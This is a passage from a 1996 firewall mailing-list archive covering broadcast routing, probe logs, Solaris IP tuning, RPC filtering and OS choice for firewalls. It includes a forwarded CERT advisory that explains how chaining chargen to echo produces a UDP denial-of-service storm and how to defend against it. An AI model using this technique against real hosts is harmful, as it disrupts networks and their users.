broadcasting to 255.255.255.255) to port 111. I saw it because our > firewall logged it when it blocked the packet. However, it made me wonder > how far it would have got if the firewall hadn't stopped it. (It had a TTL > of 60 so it was not self limiting.) Do back-bone and ISP routers block such > global traffic? If not, why aren't we swamped by it? > Whatever your ISP does, it struck me as a classic example of where the firewall > should be protecting the Internet from the private network. broadcasts should NOT be routed !!!
However it is possible to configure some routers to pass specific broadcasts (such as bootp requests). This should generally only be done if absolutely necessary as it can add a heavy processing load on the router. Regards Steve -- home steve@gbnet.org * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU work steve@demon.net * tel +44-(0)171 483 1169 FAX +44-(0)181 444 6103 www http://www.gbnet.net/ * bits steve@gbnet.net * Orange mobile +44-(0)973 600050 Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk) From firewalls-owner Thu Feb 8 11:39:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA10451 for firewalls-outgoing; Thu, 8 Feb 1996 11:29:08 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA10444 for ; Thu, 8 Feb 1996 11:29:02 -0800 (PST) Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQacbl29945; Thu, 8 Feb 1996 14:28:29 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA04179; Thu, 8 Feb 96 14:17:37 EST Date: Thu, 8 Feb 1996 14:17:36 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Hoo Dat? Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk These two d00ds crossed my sniffer after they came out from bbnplanet.net which they passed through on their way to their target, which appears to have been a firewall. Anyone got any idea who they are, or what they are up to? 
Date/time        Port  Protocol  Origin IP address
Feb 7 05:21:02   4137  tcp       203.241.159.118
Feb 7 05:21:31   4137  tcp       203.241.159.118
Feb 7 05:43:42   4243  tcp       203.241.159.118
Feb 7 05:44:11   4243  tcp       203.241.159.118
Feb 7 06:17:15   4379  tcp       203.241.159.118
Feb 7 06:17:45   4379  tcp       203.241.159.118
Feb 7 06:42:20   4474  tcp       203.241.159.118
Feb 7 06:42:25   4474  tcp       203.241.159.118
Feb 7 06:42:26   4474  tcp       203.241.159.118
Feb 7 06:42:49   4474  tcp       203.241.159.118
Feb 8 00:03:32   3708  tcp       203.241.163.77
Feb 8 00:04:02   3708  tcp       203.241.163.77
Feb 8 00:32:18   3798  tcp       203.241.163.77
Feb 8 00:32:47   3798  tcp       203.241.163.77
Feb 8 00:32:48   3798  tcp       203.241.163.77
Feb 8 00:45:33   3837  tcp       203.241.163.77
Feb 8 00:45:39   3837  tcp       203.241.163.77
Feb 8 00:46:03   3837  tcp       203.241.163.77
Feb 8 01:05:19   3896  tcp       203.241.163.77
Feb 8 01:05:20   3896  tcp       203.241.163.77
SP, tCED cDm From firewalls-owner Thu Feb 8 11:53:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA10999 for firewalls-outgoing; Thu, 8 Feb 1996 11:36:05 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA10994 for ; Thu, 8 Feb 1996 11:36:01 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Thu, 8 Feb 96 14:36:01 -0500 Message-ID: <614F1A310136C8D1@usia.gov> In-Reply-To: Date: Thu, 8 Feb 96 14:31:24 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: Re: Firewalls-Digest V5 #90 X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk i seem to be getting digests from 2 different sources, the volume numbering is different and one does have a table of contents. does anyone know what is going on? do i have to fix anything? thanks.
``````````````````````````````````````````````````````````````````` Return-Path: Received: from relay2.UU.NET by usia.gov via Connect2-SMTP 4.00 (00000A3); Thu, 8 Feb 96 14:04:31 -0500 Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQacbi24291; Thu, 8 Feb 1996 13:38:48 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02123 for firewalls-digest-outgoing; Thu, 8 Feb 1996 09:03:09 -0800 (PST) Date: Thu, 8 Feb 1996 09:03:09 -0800 (PST) Message-Id: <199602081703.JAA02123@miles.greatcircle.com> From: owner-firewalls-digest@uunet.uu.net To: firewalls-digest@GreatCircle.COM Subject: firewalls-digest V1 #1 Reply-To: firewalls@GreatCircle.COM Errors-To: owner-firewalls-digest@uunet.uu.net Precedence: bulk To: firewalls-digest@GreatCircle.COM From: owner-firewalls-digest@uunet.uu.net Reply-To: firewalls@GreatCircle.COM `````````````````````````````````````````````````````````````````````````` `````````````````` To: FIREWALL @ XGATE {firewalls-digest@GreatCircle.COM} From: Firewalls Subject: Firewalls-Digest V5 #90 Date: 2/7/96 Time: 7:56PM Return-Path: Received: from relay3.UU.NET by usia.gov via Connect2-SMTP 4.00 (00000A3); Wed, 7 Feb 96 20:37:12 -0500 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQabys00868; Wed, 7 Feb 1996 20:31:06 -0500 (EST) From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA13408 for firewalls-digest-outgoing; Wed, 7 Feb 1996 16:56:03 -0800 (PST) Date: Wed, 7 Feb 1996 16:56:03 -0800 (PST) Message-Id: <199602080056.QAA13408@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V5 #90 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Regards Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. 
Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Thu Feb 8 12:13:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA12751 for firewalls-outgoing; Thu, 8 Feb 1996 11:58:26 -0800 (PST) Received: from tiete.dcc.unicamp.br (dcc.unicamp.br [143.106.1.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA12649 for ; Thu, 8 Feb 1996 11:57:44 -0800 (PST) Received: from grande (grande.dcc.unicamp.br) by tiete.dcc.unicamp.br (4.1/SMI-4.1) id AA09967; Thu, 8 Feb 96 16:24:57 EDT Received: from negro by grande (SMI-8.6/SMI-SVR4) id QAA00554; Thu, 8 Feb 1996 16:21:47 -0200 Received: by negro (SMI-8.6/SMI-SVR4) id QAA02629; Thu, 8 Feb 1996 16:21:45 -0200 Date: Thu, 8 Feb 1996 16:21:45 -0200 From: Jose Roberto Menezes Monteiro Message-Id: <199602081821.QAA02629@negro> To: avalon@coombs.anu.edu.au, dannyc@gmap.leeds.ac.uk Subject: Re: IP kernel variable of Solaris Cc: firewalls@GreatCircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ----- Begin Included Message ----- From duarte Thu Feb 8 14:55:32 1996 Date: Thu, 8 Feb 1996 14:55:27 -0200 From: Keesje Duarte Pouw To: monteiro@dcc.unicamp.br Subject: Re: IP kernel variable of Solaris Cc: duarte Well, thanks for all the replies, but what I really need is more information about IP kernel parameters than just what ndd /dev/ip gives ... dannyc@gmap.leeds.ac.uk writes: > ndd /dev/ip \? > > You will get a list of all the IP kernel parameters which can be set, using > the ndd utility, e.g. > turns off ip_forwarding. If this is particularly what you are doing, > then don't forget to switch off ip_forward_directed_broadcasts and > ip_forward_src_routed too.
As written, some parameters are straightforward like ip_forwarding but some give me some doubt: Is *ip_ignore_redirect* to set the host to ignore ICMP redirect messages? I guess so. But some are meaningless to me! :(. For instance *ip_wroff_extra*, what is it good for? Anyway, I am looking for some reference that will give me more information about *all* the parameters, not just a list of them. :) TIA ----- End Included Message ----- From firewalls-owner Thu Feb 8 12:15:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA11570 for firewalls-outgoing; Thu, 8 Feb 1996 11:42:11 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11501 for ; Thu, 8 Feb 1996 11:41:53 -0800 (PST) Received: from pm2-22.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA28511; Thu, 8 Feb 96 14:39:44 -0500 Date: Thu, 8 Feb 96 14:39:44 -0500 Message-Id: <9602081939.AA28511@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: brian@ilinx.bctel.net, brian_murrell@bctel.net From: Frank Willoughby Subject: Re: anybody know of any vulnerabilities with "echo" Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:10 PM 2/4/96 -0800, Brian Murrell allegedly wrote: >Hi Folks, > > At a particular Internet firewall I administer, I've noticed a rash of >"echo" (udp port 7) service attempts. These came on pretty suddenly (as if >a whole shwack of people found something out) and are pretty constant now. > > I'm wondering if a new vulnerability with the (a particular implementation >maybe) echo server has been found. Anybody else notice this trend?? > >b. > > >-- >Brian J. Murrell brian@ilinx.com >InterLinx Support Services, Inc. brian@wimsey.com >North Vancouver, B.C.
604 983 UNIX > Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD One possible cause of your problems may be undesired company as mentioned in the latest CERT Advisory 96.01 - UDP Port Denial-of-Service Attack If you already have this, please feel free to hit the key now. Best Regards, Frank http://www.fortified.com/fortified [most of the headers were removed for brevity] From: CERT Advisory To: cert-advisory@cert.org Subject: CERT Advisory CA-96.01 - UDP Port Denial-of-Service Attack Reply-To: cert-advisory-request@cert.org Organization: CERT(sm) Coordination Center - +1 412-268-7090 X-UIDL: 823806055.043 ============================================================================= CERT(sm) Advisory CA-96.01 February 8, 1996 Topic: UDP Port Denial-of-Service Attack ----------------------------------------------------------------------------- The CERT Coordination Center has received reports of programs that launch denial-of-service attacks by creating a "UDP packet storm" either on a system or between two systems. An attack on one host causes that host to perform poorly. An attack between two hosts can cause extreme network congestion in addition to adversely affecting host performance. The CERT staff recommends disabling unneeded UDP services on each host, in particular the chargen and echo services, and filtering these services at the firewall or Internet gateway. Because the UDP port denial-of-service attacks typically involve IP spoofing, we encourage you to follow the recommendations in advisory CA-95:01 and CA-95:01.README. As we receive additional information relating to this advisory, we will place it in ftp://info.cert.org/pub/cert_advisories/CA-96.01.README We encourage you to check our README files regularly for updates on advisories that relate to your site. ----------------------------------------------------------------------------- I. 
Description When a connection is established between two UDP services, each of which produces output, these two services can produce a very high number of packets that can lead to a denial of service on the machine(s) where the services are offered. Anyone with network connectivity can launch an attack; no account access is needed. For example, by connecting a host's chargen service to the echo service on the same or another machine, all affected machines may be effectively taken out of service because of the excessively high number of packets produced. In addition, if two or more hosts are so connected, the intervening network may also become congested and deny service to all hosts whose traffic traverses that network. II. Impact Anyone with network connectivity can cause a denial of service. This attack does not enable them to gain additional access. III. Solution We recommend taking all the steps described below. 1. Disable and filter chargen and echo services. This attack is most readily exploited using the chargen or echo services, neither of which is generally needed as far as we are aware. We recommend that you disable both services on the host and filter them at the firewall or Internet gateway. To disable these services on a host, it is necessary to edit the inetd configuration file and cause inetd to begin using the new configuration. Exactly how to do this is system dependent so you should check your vendor's documentation for inetd(8); but on many UNIX systems the steps will be as follows: (1) Edit the inetd configuration file (e.g. /etc/inetd.conf). (2) Comment out the echo, chargen, and other UDP services not used. (3) Cause the inetd process to reread the configuration file (e.g., by sending it a HUP signal). 2. Disable and filter other unused UDP services. 
To protect against similar attacks against other services, we recommend - disabling all unused UDP services on hosts and - blocking at firewalls all UDP ports less than 900 with the exception of specific services you require, such as DNS (port 53). 3. If you must provide external access to some UDP services, consider using a proxy mechanism to protect that service from misuse. Techniques to do this are discussed in Chapter 8, "Configuring Internet Services," in _Building Internet Firewalls_ by Chapman and Zwicky (see Section IV below). 4. Monitor your network. If you do provide external UDP services, we recommend monitoring your network to learn which systems are using these services and to monitor for signs of misuse. Tools for doing so include Argus, tcpdump, and netlog. Argus is available from ftp://lancaster.andrew.cmu.edu/pub/argus-1.5/argus-1.5.tar.gz MD5 (argus-1.5.tar.gz) = 9c7052fb1742f9f6232a890267c03f3c Note that Argus requires the TCP wrappers to install: ftp://info.cert.org/pub/tools/tcp_wrappers/tcp_wrappers_7.2.tar.Z MD5 (tcp_wrappers_7.2.tar.Z) = 883d00cbd2dedd9bfc783b7065740e74 tcpdump is available from ftp://ftp.ee.lbl.gov/tcpdump-3.0.2.tar.Z MD5 (tcpdump-3.0.2.tar.Z) = c757608d5823aa68e4061ebd4753e591 Note that tcpdump requires libpcap, available at ftp://ftp.ee.lbl.gov/libpcap-0.0.6.tar.Z MD5 (libpcap-0.0.6.tar.Z) = cda0980f786932a7e2eebfb2641aa7a0 netlog is available from ftp://net.tamu.edu/pub/security/TAMU/netlog-1.2.tar.gz MD5 (netlog-1.2.tar.gz) = 1dd62e7e96192456e8c75047c38e994b 5. Take steps against IP spoofing. Because IP spoofing is typically involved in UDP port denial-of-service attacks, we encourage you to follow the guidance in advisory CA-95:01 and CA-95:01.README, available from ftp://info.cert.org/pub/cert_advisories/CA-95:01.IP.spoofing ftp://info.cert.org/pub/cert_advisories/CA-95:01.README IV. 
Sources of further information about packet filtering For general packet-filtering recommendations, see ftp://info.cert.org/pub/tech_tips/packet_filtering For in-depth discussions of how to configure your firewall, see _Firewalls and Internet Security: Repelling the Wily Hacker_ William R. Cheswick and Steven M. Bellovin Addison-Wesley Publishing Company, 1994 ISBN 0-201-63357 _Building Internet Firewalls_ Brent Chapman and Elizabeth D. Zwicky O'Reilly & Associates, Inc., 1995 ISBN 1-56592-124-0 --------------------------------------------------------------------------- The CERT Coordination Center staff thanks Peter D. Skopp of Columbia University for reporting the vulnerability and Steve Bellovin of AT&T Bell Labs for his support in responding to this problem. --------------------------------------------------------------------------- If you believe that your system has been compromised, contact the CERT Coordination Center or your representative in the Forum of Incident Response and Security Teams (FIRST). We strongly urge you to encrypt any sensitive information you send by email. The CERT Coordination Center can support a shared DES key and PGP. Contact the CERT staff for more information. Location of CERT PGP key ftp://info.cert.org/pub/CERT_PGP.key CERT Contact Information ------------------------ Email cert@cert.org Phone +1 412-268-7090 (24-hour hotline) CERT personnel answer 8:30-5:00 p.m. EST (GMT-5)/EDT(GMT-4), and are on call for emergencies during other hours.
Fax +1 412-268-6989 Postal address CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 USA To be added to our mailing list for CERT advisories and bulletins, send your email address to cert-advisory-request@cert.org CERT publications, information about FIRST representatives, and other security-related information are available for anonymous FTP from ftp://info.cert.org/pub/ CERT advisories and bulletins are also posted on the USENET newsgroup comp.security.announce Copyright 1996 Carnegie Mellon University This material may be reproduced and distributed without permission provided it is used for noncommercial purposes and the copyright statement is included. CERT is a service mark of Carnegie Mellon University. From firewalls-owner Thu Feb 8 12:19:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA10744 for firewalls-outgoing; Thu, 8 Feb 1996 11:33:08 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA10724 for ; Thu, 8 Feb 1996 11:33:00 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Thu, 8 Feb 96 14:33:01 -0500 Message-ID: <604F1A310136C8D1@usia.gov> In-Reply-To: Date: Thu, 8 Feb 96 14:30:35 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: Re: firewalls-digest V1 #1 X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk i seem to be getting digests from 2 different sources, the volume numbering is different and one does have a table of contents. does anyone know what is going on? do i have to fix anything? thanks. 
``````````````````````````````````````````````````````````````````` Return-Path: Received: from relay2.UU.NET by usia.gov via Connect2-SMTP 4.00 (00000A3); Thu, 8 Feb 96 14:04:31 -0500 Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQacbi24291; Thu, 8 Feb 1996 13:38:48 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA02123 for firewalls-digest-outgoing; Thu, 8 Feb 1996 09:03:09 -0800 (PST) Date: Thu, 8 Feb 1996 09:03:09 -0800 (PST) Message-Id: <199602081703.JAA02123@miles.greatcircle.com> From: owner-firewalls-digest@uunet.uu.net To: firewalls-digest@GreatCircle.COM Subject: firewalls-digest V1 #1 Reply-To: firewalls@GreatCircle.COM Errors-To: owner-firewalls-digest@uunet.uu.net Precedence: bulk To: firewalls-digest@GreatCircle.COM From: owner-firewalls-digest@uunet.uu.net Reply-To: firewalls@GreatCircle.COM `````````````````````````````````````````````````````````````````````````` `````````````````` To: FIREWALL @ XGATE {firewalls-digest@GreatCircle.COM} From: Firewalls Subject: Firewalls-Digest V5 #90 Date: 2/7/96 Time: 7:56PM Return-Path: Received: from relay3.UU.NET by usia.gov via Connect2-SMTP 4.00 (00000A3); Wed, 7 Feb 96 20:37:12 -0500 Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQabys00868; Wed, 7 Feb 1996 20:31:06 -0500 (EST) From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA13408 for firewalls-digest-outgoing; Wed, 7 Feb 1996 16:56:03 -0800 (PST) Date: Wed, 7 Feb 1996 16:56:03 -0800 (PST) Message-Id: <199602080056.QAA13408@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V5 #90 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Regards +++++++++++++++++++++++++++++++++++++++ + Neil Lehrer + U.S. 
Information Agency + Networks and Systems Support Division + + voice 202 619-0903 + fax 202 619-3883 + internet nlehrer@usia.gov + + "oh what a tangled net we weave + when we seek to retrieve." + +++++++++++++++++++++++++++++++++++++++ From firewalls-owner Thu Feb 8 13:09:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA15887 for firewalls-outgoing; Thu, 8 Feb 1996 12:49:02 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA15867 for ; Thu, 8 Feb 1996 12:48:51 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id OAA23131 for GreatCircle.COM!firewalls; Thu, 8 Feb 1996 14:19:58 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA19313; 8 Feb 96 14:19:57 CST (Thu) Received: by sonic.nmti.com; id AA15314; Thu, 8 Feb 1996 13:50:41 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9602081950.AA15314@sonic.nmti.com.nmti.com> Subject: Re: Product selection To: jon@london.hcsc.com (Jon Shallow) Date: Thu, 8 Feb 1996 13:50:41 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9601231435.AA05882@london.csd.harris.com> from "Jon Shallow" at Jan 23, 96 02:35:33 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Assume that sendmail was installed badly, and is still running as a 'root' > process. A 'feature' is found where the incoming mail session is able to > take control. > > This mail session at worst can only corrupt the NETWORK domain, in > particular, only the Virtual Address Space of this mail session. In particular, it can open new network connections (otherwise it can't forward mail!). For example, a proxy TCP connection between phreak.net and exploitable.victim.com. 
From firewalls-owner Thu Feb 8 13:24:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA17021 for firewalls-outgoing; Thu, 8 Feb 1996 13:16:25 -0800 (PST) Received: from MAIL.STATE.WI.US (mail.state.wi.us [165.189.87.254]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA16989 for ; Thu, 8 Feb 1996 13:16:11 -0800 (PST) From: RUNTERD@MAIL.STATE.WI.US X400-Originator: RUNTERD@MAIL.STATE.WI.US X400-Recipients: firewalls@greatcircle.com X400-MTS-Identifier: [/PRMD=WISTGOV/ADMD=ATTMAIL/C=US/;0003800002791273000004] X400-Content-Type: P2-1988 (22) Message-ID: <0003800002791273000004*@MHS> To: "firewalls(a)greatcircle.com" Subject: RPC through a firewall Date: Thu, 8 Feb 1996 15:16:29 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tuesday Feb 6, 1996, Jas (Matthew K) wrote --- .... RPC can be secured, and quite >easily at that _if_ you know what you are doing... punching it through >a firewall can be difficult, but you can get RPC to do things like a) >force it to use one and only one port, b) force it to use only TCP, c) >turn on authentication, and fold in encryption. > >***Matt > >p.s. i have no qualms in saying that some of the current >implementations of RPC servers are insecure (like NFS if not done >with SecureNFS or with kerberos).. This may be slightly off topic from pure firewalls discussion and I apologize, but I may also be in a position where I will be asked to allow RPC through a firewall. Sessions would be from a variety of platforms to a protected MVS host. I am able to address Matt's points A, B, and C (authentication only) but I have come up empty in a search for _interactive_ session encryption products that run on an MVS host. Link level encryption is recognized as the only current option. Any suggestions? Thanks all.
Bob Runte - NMB State of Wi - Dept of Admin From firewalls-owner Thu Feb 8 14:09:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA18879 for firewalls-outgoing; Thu, 8 Feb 1996 14:00:53 -0800 (PST) Received: from proton.llumc.edu (proton.llumc.edu [143.197.200.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA18873 for ; Thu, 8 Feb 1996 14:00:46 -0800 (PST) Received: from mycroft.llumc.edu (mycroft.llumc.edu [143.197.200.18]) by proton.llumc.edu (8.6.9/8.6.9) with SMTP id OAA16348; Thu, 8 Feb 1996 14:02:58 -0800 Date: Thu, 8 Feb 1996 13:52:27 -0800 (PST) From: Michael Baumann To: "Jason L. Haar" cc: brian@ilinx.bctel.net, brian_murrell@bctel.net, firewalls@GreatCircle.COM Subject: Re: anybody know of any vulnerabilities with "echo" In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 8 Feb 1996, Jason L. Haar wrote: > > > > I'm wondering if a new vulnerablity with the (a particular implementation > > maybe) echo server has been found. Anybody else notice this trend?? > > > > I wonder, this smells heavily of the "Harverst cache Web server". > Harvest uses some pretty wild checks on upstream web sites to see if > they're up or not - the default is to "ping" the host using UDP echo > packets - that could be what you're seeing. > > Of course, it goes without saying that such sites shouldn't set up such > things without ASKING those sites first... I kinda doubt it.. it seems like most of the packets that I have seen are coming from PPP accounts. [ Why am I not suprised?] -- Michael Baumann Electus Technology Inc. / Loma Linda University Medical Center San Bernardino, California. 
(909)799-8308 |Internet: baumann@llumc.edu

From firewalls-owner Thu Feb 8 14:39:46 1996
From: Dick_Wall@stratus.com
Date: Thu, 8 Feb 96 17:27:26 -0500
Subject: Non-company Access ??
To: firewalls@greatcircle.com

In a few words .. can anyone tell me how your companies handle requests for third party access to your networks ?

I get frequent requests to provide PPP or SLIP access to contractors, vendors, resellers, distributors, etc. for the purpose of accessing all sorts of applications and data bases. I also get requests to "open a hole in the firewall" to allow these folks to access our facilities.

We don't "open holes", but we do register dial access accounts. (Too many of them to make me feel comfortable). Generally, we can't restrict access on a machine basis. The requests typically are for access to a broad base of systems. Furthermore, once they are on those systems, they are free to then access other machines that the filters won't catch.

What do you all do ?? Do you allow non-company access ? Do you move all the systems to be accessed to a secure LAN ?

If you allow company A to connect to you, how do you prevent company B (which happens to be connected behind company A) from logging onto the "A" machine and passing into your net ? (The usual response I get on this one is "trust" company A ... they won't let company B do that .. )

All input is appreciated ...

Dick

From firewalls-owner Thu Feb 8 15:36:21 1996
Date: Fri, 9 Feb 1996 08:08:49 +1000
To: firewalls@GreatCircle.COM (firewalls)
From: D.Thomas@vthrc.uq.edu.au (Danny Thomas)
Subject: Re: Most Secure Unix?

Rolf Weber replies

>> I think perhaps my point wasn't made clearly. The firewall can
>> only be as good as the OS on which it exists. If your firewall
>> is an application on top of an OS, I can break the firewall by
>> breaking the OS.
>>
> i never heard of any breakin possible because of a kernel bug.
> may be i'm wrong, may be it's possible, but i cannot imagine.

Surely at least some of the patches released by Sun etc address kernel bugs with security implications? It may not have been running a firewall, but about a year ago a well known developer of Internet software took even more security precautions after his public ftp host was broken into via what was described as a kernel bug in BSDi. I'm sure that bug got fixed quickly.
cheers,
Danny Thomas

From firewalls-owner Thu Feb 8 15:49:45 1996
From: Inverardi@abacus.ch (Remo Inverardi)
To: firewalls@greatcircle.com (firewalls)
Organization: ABACUS Research AG, Rorschacherstr. 170, 9006 St. Gallen / Switzerland
Date: Thu, 08 Feb 1996 16:00:03 GMT
Subject: Re[2]: routing table go through firewall ?

Just a little question that doesn't belong here, but who cares? ;) (you? sorry.)

We want to run IPX/SPX and TCP/IP on the same network (over the same cable). Now the problem is that there are several Novell Servers between us and the router that connects us to the internet. Those Novell Servers seem to only pass on IPX/SPX packets and filter all TCP/IP traffic out. Where's the problem? Do we need to install any NLMs or something similar?

bye and thanks for your help.

iNVi.
----------------------------------------------------------------------
Remo Inverardi - Voice +41 61 811 14 82 - Fax and BBS +41 61 811 14 42
ABACUS Software Research AG - Rorschacherstr. 170 - CH-9006 St. Gallen
----------------------------------------------------------------------

From firewalls-owner Thu Feb 8 15:54:14 1996
Date: Thu, 8 Feb 1996 18:29:29 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: SickPuppyChow 1-96 Part Six Section Four

Section 4 - Dawg stuff

From: Patrick M. Bartkus <102557.3370@compuserve.com>

There are only two kinds of dogs - big dogs (good) & "endust dogs" (all that they are good for is to spray them with Endust, kick them under the bed and if they don't get it clean, spray and kick again).

From: 'Rabid Wombat'

You're still weird.

(Sick Puppy Note: plucking the whiskers from a cat, Wombat loves me, Wombat loves me not ...)

From: Bob Resino

Now go away and pee on a tree or something....
;-)

From firewalls-owner Thu Feb 8 16:09:10 1996
Date: Thu, 8 Feb 1996 17:56:03 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: SickPuppyChow 1-96, Part One

Following posting is made with permission of the owner of the list.

His Excellency Sick Puppy offers special thanks to a company that wishes to remain unidentified, to the BugFinder General of the BBC and to Russ Cooper, a consultant. Sick Puppy is grateful to all the other contributors as well.

The posting has seven parts which contain four sections.

1. Windows 95/NT security problems. (Short Part 1)
2. Windows 95/NT clobbering firewall DNS. (Long Part 2, 3, 4)
3. Windows 95/NT clobbering themselves and neighbors. (Long Part 5)
4. Dawg stuff (Short Part 6)

Section 1 Windows 95/NT security problems

Doesn't really belong on firewalls. Follow the web links.

Configuring Windows 95 h

From firewalls-owner Fri Feb 9 02:09:38 1996
From: Darren Reed
Subject: Re: NT's TCP/IP stack
To: ewoodrick@ed-com.com (Ed Woodrick)
Date: Fri, 9 Feb 1996 21:01:19 +1100 (EDT)
Cc: firewalls@GreatCircle.COM

In some mail from Ed Woodrick, sie said:
[...]
> There are some UNIX platforms that can't do that. Many UNIX systems
> haven't reached the C2 level, with or without network adapters.

So don't build a firewall around one without (at least) C2 certification, if that really bothers you. In my experience, C2 auditing is often more trouble than it's worth.

[...]
> So if I were to look at the number of break-ins on all platforms,
> besides Windows 3.X and Windows 95 which don't really implement
> industrial strength security, I would have to say that UNIX has had more
> break-ins than anything else. People have had many years of learning
> how to hack it. UNIX's inherent remote operation lends itself to
> security breaches. Heck, just let a sniffer watch people logon.

The number of breakins/security breaches to an operating system should not be a factor when choosing a platform to run a firewall. You should not be running any of these services, for starters, on such a system.
Doing so and it being a threat (ie allowing anyone shell access to it using standard login procedures) is a flaw in your firewall construction/design - irrespective of whether it is Unix or NT/Win95.

The problem with Unix is it has been designed to make it easy to network computers, use them together, remotely, etc. The problem is that the tools which were written to do this generally didn't make security a prime consideration, and nor had the amount of research that has now been done in this field been done then. There are, however, very good alternatives available for Unix which address, if not solve, many of these problems, including passwords being sent over the network for logins (Kerberos).

[...]
> As to what is the best platform to implement a firewall, my choice would
> be something that people don't know a lot about. A DOS or custom OS is
> probably a pretty good choice. UNIX, to me, is probably the worst
> choice. Too many people love to hack UNIX. And the internal works are
> too well known. It's real easy to hack something when you have the
> complete source available.

I guess this depends on how you view what your firewall is, for you. If you want to be straightjacketed into few choices and limitations in what you can do, sure, buy your custom OS. However, that flexibility of having source code, being able to hack at it yourself, provides you with much more power in making sure that what you have is the right tool. Wouldn't it be nice to be able to buy MS Word and put it together yourself, so you could leave out bits like Macros ?

If I was going to bother getting a custom OS, I'd be making sure it had been designed right, with security in mind from the start of the project rather than security being an add-on, which is what it must be for NT and Win95. Maybe buying Trusted Solaris and using Firewall-1 would be the go, or one of the other B-rated firewall operating systems.

darren

From firewalls-owner Fri Feb 9 03:55:37 1996
From: Danny Cox
